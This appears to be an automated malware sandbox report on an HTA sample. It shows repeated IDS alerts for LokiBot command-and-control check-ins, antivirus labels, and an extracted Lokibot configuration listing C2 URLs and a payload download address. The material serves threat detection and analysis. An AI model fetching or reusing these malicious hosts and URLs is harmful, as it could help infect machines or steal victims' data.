                2024-11-15T18:15:37.893726+010020243181Malware Command and Control Activity Detected192.168.2.44995694.156.177.9580TCP
                2024-11-15T18:15:39.002081+010020243181Malware Command and Control Activity Detected192.168.2.44996594.156.177.9580TCP
                2024-11-15T18:15:40.095784+010020243181Malware Command and Control Activity Detected192.168.2.44997194.156.177.9580TCP
                2024-11-15T18:15:41.246344+010020243181Malware Command and Control Activity Detected192.168.2.44997894.156.177.9580TCP
                2024-11-15T18:15:42.358174+010020243181Malware Command and Control Activity Detected192.168.2.44998594.156.177.9580TCP
                2024-11-15T18:15:43.496054+010020243181Malware Command and Control Activity Detected192.168.2.44999194.156.177.9580TCP
                2024-11-15T18:15:44.609401+010020243181Malware Command and Control Activity Detected192.168.2.44999894.156.177.9580TCP
                2024-11-15T18:15:45.720877+010020243181Malware Command and Control Activity Detected192.168.2.45000394.156.177.9580TCP
                2024-11-15T18:15:47.222539+010020243181Malware Command and Control Activity Detected192.168.2.45001094.156.177.9580TCP
                2024-11-15T18:15:48.320341+010020243181Malware Command and Control Activity Detected192.168.2.45001694.156.177.9580TCP
                2024-11-15T18:15:49.484132+010020243181Malware Command and Control Activity Detected192.168.2.45002194.156.177.9580TCP
                2024-11-15T18:15:51.299265+010020243181Malware Command and Control Activity Detected192.168.2.45002694.156.177.9580TCP
                2024-11-15T18:15:52.389939+010020243181Malware Command and Control Activity Detected192.168.2.45003094.156.177.9580TCP
                2024-11-15T18:15:53.531119+010020243181Malware Command and Control Activity Detected192.168.2.45003994.156.177.9580TCP
                2024-11-15T18:15:54.620846+010020243181Malware Command and Control Activity Detected192.168.2.45004494.156.177.9580TCP
                2024-11-15T18:15:55.779442+010020243181Malware Command and Control Activity Detected192.168.2.45004994.156.177.9580TCP
                2024-11-15T18:15:56.869263+010020243181Malware Command and Control Activity Detected192.168.2.45005494.156.177.9580TCP
                2024-11-15T18:15:58.000787+010020243181Malware Command and Control Activity Detected192.168.2.45006394.156.177.9580TCP
                2024-11-15T18:15:59.147535+010020243181Malware Command and Control Activity Detected192.168.2.45006894.156.177.9580TCP
                2024-11-15T18:16:00.270107+010020243181Malware Command and Control Activity Detected192.168.2.45007394.156.177.9580TCP
                2024-11-15T18:16:01.383166+010020243181Malware Command and Control Activity Detected192.168.2.45008094.156.177.9580TCP
                2024-11-15T18:16:02.497178+010020243181Malware Command and Control Activity Detected192.168.2.45008494.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:28.588137+010020216411A Network Trojan was detected192.168.2.44973994.156.177.9580TCP
                2024-11-15T18:14:29.696597+010020216411A Network Trojan was detected192.168.2.44974094.156.177.9580TCP
                2024-11-15T18:14:30.795104+010020216411A Network Trojan was detected192.168.2.44974194.156.177.9580TCP
                2024-11-15T18:14:31.919895+010020216411A Network Trojan was detected192.168.2.44974294.156.177.9580TCP
                2024-11-15T18:14:33.059121+010020216411A Network Trojan was detected192.168.2.44974394.156.177.9580TCP
                2024-11-15T18:14:34.179211+010020216411A Network Trojan was detected192.168.2.44974494.156.177.9580TCP
                2024-11-15T18:14:35.327062+010020216411A Network Trojan was detected192.168.2.44974594.156.177.9580TCP
                2024-11-15T18:14:36.470587+010020216411A Network Trojan was detected192.168.2.44974694.156.177.9580TCP
                2024-11-15T18:14:37.613187+010020216411A Network Trojan was detected192.168.2.44974794.156.177.9580TCP
                2024-11-15T18:14:38.767433+010020216411A Network Trojan was detected192.168.2.44974894.156.177.9580TCP
                2024-11-15T18:14:39.915789+010020216411A Network Trojan was detected192.168.2.44974994.156.177.9580TCP
                2024-11-15T18:14:41.021819+010020216411A Network Trojan was detected192.168.2.44975094.156.177.9580TCP
                2024-11-15T18:14:42.169695+010020216411A Network Trojan was detected192.168.2.44975194.156.177.9580TCP
                2024-11-15T18:14:43.295006+010020216411A Network Trojan was detected192.168.2.44975294.156.177.9580TCP
                2024-11-15T18:14:44.446888+010020216411A Network Trojan was detected192.168.2.44975394.156.177.9580TCP
                2024-11-15T18:14:45.590810+010020216411A Network Trojan was detected192.168.2.44975494.156.177.9580TCP
                2024-11-15T18:14:46.714498+010020216411A Network Trojan was detected192.168.2.44975594.156.177.9580TCP
                2024-11-15T18:14:47.882051+010020216411A Network Trojan was detected192.168.2.44975694.156.177.9580TCP
                2024-11-15T18:14:49.034112+010020216411A Network Trojan was detected192.168.2.44975794.156.177.9580TCP
                2024-11-15T18:14:50.182971+010020216411A Network Trojan was detected192.168.2.44975894.156.177.9580TCP
                2024-11-15T18:14:51.319509+010020216411A Network Trojan was detected192.168.2.44975994.156.177.9580TCP
                2024-11-15T18:14:52.454053+010020216411A Network Trojan was detected192.168.2.44976094.156.177.9580TCP
                2024-11-15T18:14:53.594421+010020216411A Network Trojan was detected192.168.2.44976194.156.177.9580TCP
                2024-11-15T18:14:54.694505+010020216411A Network Trojan was detected192.168.2.44976294.156.177.9580TCP
                2024-11-15T18:14:56.897576+010020216411A Network Trojan was detected192.168.2.44976394.156.177.9580TCP
                2024-11-15T18:14:58.049519+010020216411A Network Trojan was detected192.168.2.44976594.156.177.9580TCP
                2024-11-15T18:14:59.161814+010020216411A Network Trojan was detected192.168.2.44976794.156.177.9580TCP
                2024-11-15T18:15:00.310997+010020216411A Network Trojan was detected192.168.2.44977394.156.177.9580TCP
                2024-11-15T18:15:01.433270+010020216411A Network Trojan was detected192.168.2.44977994.156.177.9580TCP
                2024-11-15T18:15:02.774194+010020216411A Network Trojan was detected192.168.2.44978594.156.177.9580TCP
                2024-11-15T18:15:03.942454+010020216411A Network Trojan was detected192.168.2.44979594.156.177.9580TCP
                2024-11-15T18:15:05.073942+010020216411A Network Trojan was detected192.168.2.44980294.156.177.9580TCP
                2024-11-15T18:15:06.199202+010020216411A Network Trojan was detected192.168.2.44980894.156.177.9580TCP
                2024-11-15T18:15:07.370279+010020216411A Network Trojan was detected192.168.2.44981394.156.177.9580TCP
                2024-11-15T18:15:08.480132+010020216411A Network Trojan was detected192.168.2.44981894.156.177.9580TCP
                2024-11-15T18:15:09.759213+010020216411A Network Trojan was detected192.168.2.44982594.156.177.9580TCP
                2024-11-15T18:15:10.869167+010020216411A Network Trojan was detected192.168.2.44983294.156.177.9580TCP
                2024-11-15T18:15:12.002434+010020216411A Network Trojan was detected192.168.2.44983694.156.177.9580TCP
                2024-11-15T18:15:13.104632+010020216411A Network Trojan was detected192.168.2.44984194.156.177.9580TCP
                2024-11-15T18:15:14.236003+010020216411A Network Trojan was detected192.168.2.44984994.156.177.9580TCP
                2024-11-15T18:15:15.349391+010020216411A Network Trojan was detected192.168.2.44985594.156.177.9580TCP
                2024-11-15T18:15:16.433713+010020216411A Network Trojan was detected192.168.2.44986094.156.177.9580TCP
                2024-11-15T18:15:17.538066+010020216411A Network Trojan was detected192.168.2.44986594.156.177.9580TCP
                2024-11-15T18:15:18.633126+010020216411A Network Trojan was detected192.168.2.44986994.156.177.9580TCP
                2024-11-15T18:15:19.765315+010020216411A Network Trojan was detected192.168.2.44987594.156.177.9580TCP
                2024-11-15T18:15:20.938967+010020216411A Network Trojan was detected192.168.2.44987994.156.177.9580TCP
                2024-11-15T18:15:22.075165+010020216411A Network Trojan was detected192.168.2.44988494.156.177.9580TCP
                2024-11-15T18:15:23.183308+010020216411A Network Trojan was detected192.168.2.44988894.156.177.9580TCP
                2024-11-15T18:15:24.806146+010020216411A Network Trojan was detected192.168.2.44989594.156.177.9580TCP
                2024-11-15T18:15:26.050868+010020216411A Network Trojan was detected192.168.2.44990094.156.177.9580TCP
                2024-11-15T18:15:27.207351+010020216411A Network Trojan was detected192.168.2.44990594.156.177.9580TCP
                2024-11-15T18:15:28.328661+010020216411A Network Trojan was detected192.168.2.44991194.156.177.9580TCP
                2024-11-15T18:15:29.444036+010020216411A Network Trojan was detected192.168.2.44991894.156.177.9580TCP
                2024-11-15T18:15:30.558346+010020216411A Network Trojan was detected192.168.2.44992394.156.177.9580TCP
                2024-11-15T18:15:32.185276+010020216411A Network Trojan was detected192.168.2.44993294.156.177.9580TCP
                2024-11-15T18:15:33.342990+010020216411A Network Trojan was detected192.168.2.44993694.156.177.9580TCP
                2024-11-15T18:15:34.461022+010020216411A Network Trojan was detected192.168.2.44994294.156.177.9580TCP
                2024-11-15T18:15:35.606842+010020216411A Network Trojan was detected192.168.2.44994994.156.177.9580TCP
                2024-11-15T18:15:36.942827+010020216411A Network Trojan was detected192.168.2.44995694.156.177.9580TCP
                2024-11-15T18:15:38.040556+010020216411A Network Trojan was detected192.168.2.44996594.156.177.9580TCP
                2024-11-15T18:15:39.160355+010020216411A Network Trojan was detected192.168.2.44997194.156.177.9580TCP
                2024-11-15T18:15:40.257744+010020216411A Network Trojan was detected192.168.2.44997894.156.177.9580TCP
                2024-11-15T18:15:41.402378+010020216411A Network Trojan was detected192.168.2.44998594.156.177.9580TCP
                2024-11-15T18:15:42.524040+010020216411A Network Trojan was detected192.168.2.44999194.156.177.9580TCP
                2024-11-15T18:15:43.648109+010020216411A Network Trojan was detected192.168.2.44999894.156.177.9580TCP
                2024-11-15T18:15:44.761342+010020216411A Network Trojan was detected192.168.2.45000394.156.177.9580TCP
                2024-11-15T18:15:45.883899+010020216411A Network Trojan was detected192.168.2.45001094.156.177.9580TCP
                2024-11-15T18:15:47.367955+010020216411A Network Trojan was detected192.168.2.45001694.156.177.9580TCP
                2024-11-15T18:15:48.523172+010020216411A Network Trojan was detected192.168.2.45002194.156.177.9580TCP
                2024-11-15T18:15:49.631500+010020216411A Network Trojan was detected192.168.2.45002694.156.177.9580TCP
                2024-11-15T18:15:51.452174+010020216411A Network Trojan was detected192.168.2.45003094.156.177.9580TCP
                2024-11-15T18:15:52.550655+010020216411A Network Trojan was detected192.168.2.45003994.156.177.9580TCP
                2024-11-15T18:15:53.681411+010020216411A Network Trojan was detected192.168.2.45004494.156.177.9580TCP
                2024-11-15T18:15:54.778594+010020216411A Network Trojan was detected192.168.2.45004994.156.177.9580TCP
                2024-11-15T18:15:55.941777+010020216411A Network Trojan was detected192.168.2.45005494.156.177.9580TCP
                2024-11-15T18:15:57.034588+010020216411A Network Trojan was detected192.168.2.45006394.156.177.9580TCP
                2024-11-15T18:15:58.148280+010020216411A Network Trojan was detected192.168.2.45006894.156.177.9580TCP
                2024-11-15T18:15:59.321996+010020216411A Network Trojan was detected192.168.2.45007394.156.177.9580TCP
                2024-11-15T18:16:00.432593+010020216411A Network Trojan was detected192.168.2.45008094.156.177.9580TCP
                2024-11-15T18:16:01.549900+010020216411A Network Trojan was detected192.168.2.45008494.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:28.588137+010028257661Malware Command and Control Activity Detected192.168.2.44973994.156.177.9580TCP
                2024-11-15T18:14:29.696597+010028257661Malware Command and Control Activity Detected192.168.2.44974094.156.177.9580TCP
                2024-11-15T18:14:30.795104+010028257661Malware Command and Control Activity Detected192.168.2.44974194.156.177.9580TCP
                2024-11-15T18:14:31.919895+010028257661Malware Command and Control Activity Detected192.168.2.44974294.156.177.9580TCP
                2024-11-15T18:14:33.059121+010028257661Malware Command and Control Activity Detected192.168.2.44974394.156.177.9580TCP
                2024-11-15T18:14:34.179211+010028257661Malware Command and Control Activity Detected192.168.2.44974494.156.177.9580TCP
                2024-11-15T18:14:35.327062+010028257661Malware Command and Control Activity Detected192.168.2.44974594.156.177.9580TCP
                2024-11-15T18:14:36.470587+010028257661Malware Command and Control Activity Detected192.168.2.44974694.156.177.9580TCP
                2024-11-15T18:14:37.613187+010028257661Malware Command and Control Activity Detected192.168.2.44974794.156.177.9580TCP
                2024-11-15T18:14:38.767433+010028257661Malware Command and Control Activity Detected192.168.2.44974894.156.177.9580TCP
                2024-11-15T18:14:39.915789+010028257661Malware Command and Control Activity Detected192.168.2.44974994.156.177.9580TCP
                2024-11-15T18:14:41.021819+010028257661Malware Command and Control Activity Detected192.168.2.44975094.156.177.9580TCP
                2024-11-15T18:14:42.169695+010028257661Malware Command and Control Activity Detected192.168.2.44975194.156.177.9580TCP
                2024-11-15T18:14:43.295006+010028257661Malware Command and Control Activity Detected192.168.2.44975294.156.177.9580TCP
                2024-11-15T18:14:44.446888+010028257661Malware Command and Control Activity Detected192.168.2.44975394.156.177.9580TCP
                2024-11-15T18:14:45.590810+010028257661Malware Command and Control Activity Detected192.168.2.44975494.156.177.9580TCP
                2024-11-15T18:14:46.714498+010028257661Malware Command and Control Activity Detected192.168.2.44975594.156.177.9580TCP
                2024-11-15T18:14:47.882051+010028257661Malware Command and Control Activity Detected192.168.2.44975694.156.177.9580TCP
                2024-11-15T18:14:49.034112+010028257661Malware Command and Control Activity Detected192.168.2.44975794.156.177.9580TCP
                2024-11-15T18:14:50.182971+010028257661Malware Command and Control Activity Detected192.168.2.44975894.156.177.9580TCP
                2024-11-15T18:14:51.319509+010028257661Malware Command and Control Activity Detected192.168.2.44975994.156.177.9580TCP
                2024-11-15T18:14:52.454053+010028257661Malware Command and Control Activity Detected192.168.2.44976094.156.177.9580TCP
                2024-11-15T18:14:53.594421+010028257661Malware Command and Control Activity Detected192.168.2.44976194.156.177.9580TCP
                2024-11-15T18:14:54.694505+010028257661Malware Command and Control Activity Detected192.168.2.44976294.156.177.9580TCP
                2024-11-15T18:14:56.897576+010028257661Malware Command and Control Activity Detected192.168.2.44976394.156.177.9580TCP
                2024-11-15T18:14:58.049519+010028257661Malware Command and Control Activity Detected192.168.2.44976594.156.177.9580TCP
                2024-11-15T18:14:59.161814+010028257661Malware Command and Control Activity Detected192.168.2.44976794.156.177.9580TCP
                2024-11-15T18:15:00.310997+010028257661Malware Command and Control Activity Detected192.168.2.44977394.156.177.9580TCP
                2024-11-15T18:15:01.433270+010028257661Malware Command and Control Activity Detected192.168.2.44977994.156.177.9580TCP
                2024-11-15T18:15:02.774194+010028257661Malware Command and Control Activity Detected192.168.2.44978594.156.177.9580TCP
                2024-11-15T18:15:03.942454+010028257661Malware Command and Control Activity Detected192.168.2.44979594.156.177.9580TCP
                2024-11-15T18:15:05.073942+010028257661Malware Command and Control Activity Detected192.168.2.44980294.156.177.9580TCP
                2024-11-15T18:15:06.199202+010028257661Malware Command and Control Activity Detected192.168.2.44980894.156.177.9580TCP
                2024-11-15T18:15:07.370279+010028257661Malware Command and Control Activity Detected192.168.2.44981394.156.177.9580TCP
                2024-11-15T18:15:08.480132+010028257661Malware Command and Control Activity Detected192.168.2.44981894.156.177.9580TCP
                2024-11-15T18:15:09.759213+010028257661Malware Command and Control Activity Detected192.168.2.44982594.156.177.9580TCP
                2024-11-15T18:15:10.869167+010028257661Malware Command and Control Activity Detected192.168.2.44983294.156.177.9580TCP
                2024-11-15T18:15:12.002434+010028257661Malware Command and Control Activity Detected192.168.2.44983694.156.177.9580TCP
                2024-11-15T18:15:13.104632+010028257661Malware Command and Control Activity Detected192.168.2.44984194.156.177.9580TCP
                2024-11-15T18:15:14.236003+010028257661Malware Command and Control Activity Detected192.168.2.44984994.156.177.9580TCP
                2024-11-15T18:15:15.349391+010028257661Malware Command and Control Activity Detected192.168.2.44985594.156.177.9580TCP
                2024-11-15T18:15:16.433713+010028257661Malware Command and Control Activity Detected192.168.2.44986094.156.177.9580TCP
                2024-11-15T18:15:17.538066+010028257661Malware Command and Control Activity Detected192.168.2.44986594.156.177.9580TCP
                2024-11-15T18:15:18.633126+010028257661Malware Command and Control Activity Detected192.168.2.44986994.156.177.9580TCP
                2024-11-15T18:15:19.765315+010028257661Malware Command and Control Activity Detected192.168.2.44987594.156.177.9580TCP
                2024-11-15T18:15:20.938967+010028257661Malware Command and Control Activity Detected192.168.2.44987994.156.177.9580TCP
                2024-11-15T18:15:22.075165+010028257661Malware Command and Control Activity Detected192.168.2.44988494.156.177.9580TCP
                2024-11-15T18:15:23.183308+010028257661Malware Command and Control Activity Detected192.168.2.44988894.156.177.9580TCP
                2024-11-15T18:15:24.806146+010028257661Malware Command and Control Activity Detected192.168.2.44989594.156.177.9580TCP
                2024-11-15T18:15:26.050868+010028257661Malware Command and Control Activity Detected192.168.2.44990094.156.177.9580TCP
                2024-11-15T18:15:27.207351+010028257661Malware Command and Control Activity Detected192.168.2.44990594.156.177.9580TCP
                2024-11-15T18:15:28.328661+010028257661Malware Command and Control Activity Detected192.168.2.44991194.156.177.9580TCP
                2024-11-15T18:15:29.444036+010028257661Malware Command and Control Activity Detected192.168.2.44991894.156.177.9580TCP
                2024-11-15T18:15:30.558346+010028257661Malware Command and Control Activity Detected192.168.2.44992394.156.177.9580TCP
                2024-11-15T18:15:32.185276+010028257661Malware Command and Control Activity Detected192.168.2.44993294.156.177.9580TCP
                2024-11-15T18:15:33.342990+010028257661Malware Command and Control Activity Detected192.168.2.44993694.156.177.9580TCP
                2024-11-15T18:15:34.461022+010028257661Malware Command and Control Activity Detected192.168.2.44994294.156.177.9580TCP
                2024-11-15T18:15:35.606842+010028257661Malware Command and Control Activity Detected192.168.2.44994994.156.177.9580TCP
                2024-11-15T18:15:36.942827+010028257661Malware Command and Control Activity Detected192.168.2.44995694.156.177.9580TCP
                2024-11-15T18:15:38.040556+010028257661Malware Command and Control Activity Detected192.168.2.44996594.156.177.9580TCP
                2024-11-15T18:15:39.160355+010028257661Malware Command and Control Activity Detected192.168.2.44997194.156.177.9580TCP
                2024-11-15T18:15:40.257744+010028257661Malware Command and Control Activity Detected192.168.2.44997894.156.177.9580TCP
                2024-11-15T18:15:41.402378+010028257661Malware Command and Control Activity Detected192.168.2.44998594.156.177.9580TCP
                2024-11-15T18:15:42.524040+010028257661Malware Command and Control Activity Detected192.168.2.44999194.156.177.9580TCP
                2024-11-15T18:15:43.648109+010028257661Malware Command and Control Activity Detected192.168.2.44999894.156.177.9580TCP
                2024-11-15T18:15:44.761342+010028257661Malware Command and Control Activity Detected192.168.2.45000394.156.177.9580TCP
                2024-11-15T18:15:45.883899+010028257661Malware Command and Control Activity Detected192.168.2.45001094.156.177.9580TCP
                2024-11-15T18:15:47.367955+010028257661Malware Command and Control Activity Detected192.168.2.45001694.156.177.9580TCP
                2024-11-15T18:15:48.523172+010028257661Malware Command and Control Activity Detected192.168.2.45002194.156.177.9580TCP
                2024-11-15T18:15:49.631500+010028257661Malware Command and Control Activity Detected192.168.2.45002694.156.177.9580TCP
                2024-11-15T18:15:51.452174+010028257661Malware Command and Control Activity Detected192.168.2.45003094.156.177.9580TCP
                2024-11-15T18:15:52.550655+010028257661Malware Command and Control Activity Detected192.168.2.45003994.156.177.9580TCP
                2024-11-15T18:15:53.681411+010028257661Malware Command and Control Activity Detected192.168.2.45004494.156.177.9580TCP
                2024-11-15T18:15:54.778594+010028257661Malware Command and Control Activity Detected192.168.2.45004994.156.177.9580TCP
                2024-11-15T18:15:55.941777+010028257661Malware Command and Control Activity Detected192.168.2.45005494.156.177.9580TCP
                2024-11-15T18:15:57.034588+010028257661Malware Command and Control Activity Detected192.168.2.45006394.156.177.9580TCP
                2024-11-15T18:15:58.148280+010028257661Malware Command and Control Activity Detected192.168.2.45006894.156.177.9580TCP
                2024-11-15T18:15:59.321996+010028257661Malware Command and Control Activity Detected192.168.2.45007394.156.177.9580TCP
                2024-11-15T18:16:00.432593+010028257661Malware Command and Control Activity Detected192.168.2.45008094.156.177.9580TCP
                2024-11-15T18:16:01.549900+010028257661Malware Command and Control Activity Detected192.168.2.45008494.156.177.9580TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:04.339237+010028582951A Network Trojan was detected192.3.243.13680192.168.2.449738TCP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2024-11-15T18:14:06.302119+010028587951A Network Trojan was detected192.168.2.449730192.3.243.13680TCP

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Source: 94.156.177.95/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: http://94.156.177.95/simple/five/fre.phpAvira URL Cloud: Label: malware
                Source: http://192.3.243.136/33/seemybestthingswhichcallyoubabygirlwhichgiveuhotchicks.tIFAvira URL Cloud: Label: malware
                Source: 00000009.00000002.1951506450.0000000006A0C000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: Lokibot {"C2 list": ["http://kbfvzoboss.bid/alien/fre.php", "http://alphastand.trade/alien/fre.php", "http://alphastand.win/alien/fre.php", "http://alphastand.top/alien/fre.php", "94.156.177.95/simple/five/fre.php"]}
                Source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.htaReversingLabs: Detection: 21%
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability

                Phishing

                barindex
                Source: Yara matchFile source: bestgirlfriendwhowintheheartwithentirelifegivenubestthigns.hta, type: SAMPLE
                Source: unknownHTTPS traffic detected: 142.215.209.78:443 -> 192.168.2.4:49731 version: TLS 1.2
                Source: Binary string: System.Management.Automation.pdb source: powershell.exe, 00000003.00000002.1715998634.0000000007651000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdbJ source: powershell.exe, 00000003.00000002.1716282823.000000000767A000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: aspnet_compiler.pdb source: 31437F.exe.13.dr
                Source: Binary string: $^q7C:\Users\user\AppData\Local\Temp\dnftngtc\dnftngtc.pdb source: powershell.exe, 00000001.00000002.1822805726.00000000059C6000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.dss source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnet.pdb.managed source: powershell.exe, 00000009.00000002.1993655001.000000000716A000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: dnlib.dotnetimethoddecrypterdnlib.dotnetassemblynamecomparerdnlib.dotnetiresolutionscopednlib.dotnetsecurityattributednlib.dotnet.writerpeheadersoptionsdnlib.dotnet.writerioffsetheap`1dnlib.dotnetimethoddnlib.dotnetcorlibtypesdnlib.dotnet.writertablesheapdnlib.dotnet.emitopcodetypednlib.dotnetiassemblyresolverdnlib.dotnetassemblyattributesdnlib.dotneticustomattributetypednlib.dotnetdummyloggerdnlib.dotnet.mdrawfieldptrrowdnlib.dotnetiloggermicrosoft.win32.taskschedulerdailytriggerdnlib.dotnettyperefuserdnlib.dotnet.writerdummymodulewriterlistenerdnlib.dotnetassemblyhashalgorithmdnlib.dotnet.pdbpdbdocumentdnlib.dotnetpinvokeattributesdnlib.dotnetivariablednlib.dotnetresourcednlib.dotnet.writerchunklist`1dnlib.dotnetiistypeormethodmicrosoft.win32.taskschedulercustomtriggerdnlib.dotnet.writerstartupstubdnlib.dotnetgenericinstmethodsigdnlib.dotnetmemberrefuserdnlib.dotnet.mdcomimageflagsdnlib.dotnetgenericparamdnlib.dotnet.writerchunklistbase`1dnlib.utilsextensionsdnlib.dotnetnativetypednlib.dotnet.mdrawenclogrowdnlib.dotnetgenericparamcontextdnlib.peimageoptionalheader64dnlib.dotnet.mdrawnestedclassrowdnlib.dotnetextensionsdnlib.dotneteventdefdnlib.dotnet.emitlocalc`5dnlib.dotneticontainsgenericparameterb`3b`1b`1b`1dnlib.dotnetitokenoperandc`1dnlib.dotnet.writerimdtablednlib.pedllcharacteristicsdnlib.dotnetifullnamednlib.dotnet.resourcesresourcereaderdnlib.dotnetstrongnamepublickeydnlib.dotnet.mdrawassemblyprocessorrowdnlib.dotnetbytearrayequalitycomparerdnlib.dotnet.mdrawmethodsemanticsrowdnlib.ioiimagestreamcreatordnlib.dotnetvtablefixupsmicrosoft.win32.taskschedulertaskprincipalprivilegemicrosoft.win32.taskschedulertasksnapshotdnlib.dotnet.pdbsymbolreadercreatordnlib.dotnet.emitinstructionprinterdnlib.dotnettypeequalitycomparerdnlib.dotnet.mdimagecor20headerdnlib.dotnet.mdirawrowdnlib.dotnet.writermethodbodywriterjgmicrosoft.win32.taskschedulertaskregistrationinfojfjejdjcmicrosoft.win32.taskschedulershowmessageactionjbdnlib.dotnetihasdeclsecuritycomhandlerupdatejamicrosoft.win32.taskschedulereventtriggerdnlib.dotnetimanagedentrypointstartup_informationmicrosoft.win32.taskscheduler.fluentmonthlydowtriggerbuildermicrosoft.win32.taskschedulertaskauditrulednlib.dotnet.writerstrongnamesignaturednlib.dotnetitypednlib.dotnetsentinelsigdnlib.dotnet.mdicolumnreaderdnlib.dotnet.writermodulewritereventdnlib.dotnettypenameparserdnlib.dotneticustomattributednlib.dotnet.pdb.dsssymbolwritercreatordnlib.dotnet.resourcesbinaryresourcedatadnlib.dotnet.mdrawtyperefrowdnlib.ioimagestreamcreatorconnectiontokenex`2dnlib.pepeextensionsdnlib.dotnet.pdbsequencepointdnlib.dotnetlinkedresourcednlib.dotnettyperefdnlib.dotnetpublickeydnlib.dotnetiassemblyreffinderdnlib.dotnet.mdrawgenericparamconstraintrowdnlib.dotnettypedefdnlib.dotnetrecursioncounterdnlib.dotnet.mdrawassemblyrefosrowdnlib.pecharacteristicsdnlib.w32resourcesresourcedirectorype source: powershell.exe, 00000009.00000002.1992279886.0000000006CF0000.00000004.00000800.00020000.00000000.sdmp
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 13_2_00403D74 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,13_2_00403D74

                Software Vulnerabilities

                barindex
                Source: C:\Windows\SysWOW64\wscript.exeChild: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe

                Networking

                barindex
                Source: Network trafficSuricata IDS: 2858795 - Severity 1 - ETPRO MALWARE ReverseLoader Payload Request (GET) M2 : 192.168.2.4:49730 -> 192.3.243.136:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49757 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49757 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49747 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49757 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49759 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49756 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49756 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49747 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49759 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49756 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49750 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49755 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49750 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49742 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49750 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024313 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M1 : 192.168.2.4:49756 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49742 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49743 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49755 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2021641 - Severity 1 - ET MALWARE LokiBot User-Agent (Charon/Inferno) : 192.168.2.4:49765 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2825766 - Severity 1 - ETPRO MALWARE LokiBot Checkin M2 : 192.168.2.4:49755 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2025381 - Severity 1 - ET MALWARE LokiBot Checkin : 192.168.2.4:49743 -> 94.156.177.95:80
                Source: Network trafficSuricata IDS: 2024318 - Severity 1 - ET MALWARE LokiBot Request for C2 Commands Detected M2 : 192.168.2.4:49756 -> 94.156.177.95:80
